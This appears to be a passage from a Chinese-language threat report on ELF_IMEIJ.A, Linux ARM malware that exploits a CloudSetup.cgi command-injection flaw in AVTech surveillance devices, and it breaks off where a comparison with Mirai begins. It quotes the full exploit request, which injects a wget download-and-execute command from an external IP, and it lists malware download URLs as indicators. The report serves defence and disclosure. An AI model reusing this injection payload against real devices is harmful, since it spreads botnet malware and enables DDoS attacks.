Linux一直是企业平台和物联网制造商的首选操作系统,基于Linux的设备也被不断部署在许多不同行业的智能系统中,不过随着其广泛使用,我们也看到了以Linux为攻击目标的安全威胁数量正在快速上升。我们以前报告了2016年一系列的Linux威胁,其中最引人注目的是Mirai恶意软件。
最近检测到的一个针对Linux ARM的恶意软件ELF_IMEIJ.A(趋势科技检测并标记为ELF_IMEIJ.A)。ELF_IMEIJ.A利用了AVTech(一家监控技术公司)设备中的一个漏洞。该漏洞由Search-Lab(一个安全研究机构)发现并报告,并于2016年10月向AVTech披露。但是,截至目前似乎厂家还没有对这个漏洞进行修复。
ELF_IMEIJ.A和Mirai的比较
ELF_IMEIJ.A通过RFIs在cgi-bin脚本中进行传播。远程攻击者将此请求发送到随机IP地址,并尝试利用此漏洞:
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1
具体来说,ELF_IMEIJ.A就是利用AVTech所报告的CGI目录漏洞CloudSetup.cgi来执行触发恶意软件下载的命令注入。攻击者欺骗设备下载恶意文件,并更改文件的权限,最终进行恶意攻击。
ELF_IMEIJ.A的攻击起始于连接AVTech的设备,如支持AVTech云的IP摄像机,CCTV设备和网络录像机。一旦这些设备感染了这个恶意软件,恶意程序就会开始收集系统信息和用户的网络活动数据。它还可以执行来自恶意actor的shell命令,启动分布式拒绝服务(DDoS)攻击并让自己进入休眠状态。更危险的是,受感染的设备还会将连接到同一网络的其他设备也感染了。
目前,趋势科技检测到总共有三个IP地址可以下载ELF_IMEIJ.A,并且这三个IP都托管在两个单独的ISP上。
hxxp://172.247.116.3:8080/Arm1 hxxp://172.247.116.21:85/Arm1 hxxp://192.154.108.2:8080/Arm1
经过分析,托管的ISP位于韩国。
根据报道,AVTech目前已有超过13万个不同的设备连接到互联网,所以ELF_IMEIJ.A的攻击可以进行大规模的攻击,更糟的是,如果ELF_IMEIJ.A把这些设备可以变成网络僵尸,那可以用于发动大规模的DDoS攻击。与大多数网络连接设备一样,它们并不是默认安全的,不可能直接监控。
ELF_IMEIJ.A所带来的DDoS攻击可能会与Mirai比较相似,但他们也有明显的区别: